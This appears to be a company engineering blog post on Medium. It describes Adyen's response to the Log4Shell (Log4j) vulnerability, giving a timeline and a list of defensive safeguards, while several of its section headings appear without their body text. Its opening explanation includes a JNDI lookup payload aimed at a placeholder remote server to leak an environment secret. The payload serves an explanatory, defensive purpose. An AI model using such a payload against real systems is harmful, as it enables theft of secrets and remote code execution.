Adyen Tech
Published in

Adyen Tech

Inside Adyen: The Log4j Saga

By Beppe Catanese, Developer Advocate, Adyen

Adyen Team — Photo by author
Adyen Team — Photo by author

Log4Shell in simple words

public Class myWrapper {
public doSomething(String user_input) {
logger.info(user_input);
}
}
new myWrapper().doSomething
(“${jndi:ldap://remoteserver.com/{env:SECRET}}”);

What about Adyen

Detection

Impact

Safekeeping factors

  • Outbound connections (Egress Traffic) are strictly regulated and allowed only when absolutely necessary both on system and application level.
  • Systems are kept up-to-date with JDK releases and library patches.
  • Good application design and maintenance enables us to patch Log4j versions rapidly without introducing incompatibilities or breaking changes.
  • JNDI usage on the platform is strongly limited by design.
  • Thread context is exclusively set within local application information thus not being possible under any circumstances to be controlled by user input/crafted requests.
  • Adopting a “Zero-Trust” network with strong firewall rules to limit the impact of a breach.
  • “Principle of Least Privilege” where applications and containers never run with any kind of elevated access scope.
  • Thorough logging and observability mindset where all networking, system, databases, security and user activities are available to perform in-depth threat hunting activities.
  • Sharp monitoring, built through extensive logging capabilities and enriched with external sources, which allowed new data points to be constantly updated in order to detect and alert of evolving threats, and respond rapidly even in a high stress situation.

Patching and validation

Merchants first

A busy day at Adyen

  • h08:05 Adyen engineers became aware of the vulnerability.
  • h09:15 Apache Log4j vulnerability published by NIST.
  • h10:00 Initial Security assessment completed: no impact thanks to mitigating factors in place.
  • h11:50 Concluded review of the entire Adyen platform: no instances could be exploited.
  • h14:05 Developing and testing new releases complete.
  • h17:00 Platform-wide patching and testing (Apache Log4j upgrade).
  • h17:45 Security analysis conclusion to confirm health of platform.
Adyen Picture (high-five between team members) — Photo by author
Adyen Picture — Photo by author

Tips for developers

Final words

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Adyen

Development and design stories from the company building the world’s payments infrastructure. https://www.adyen.com/careers/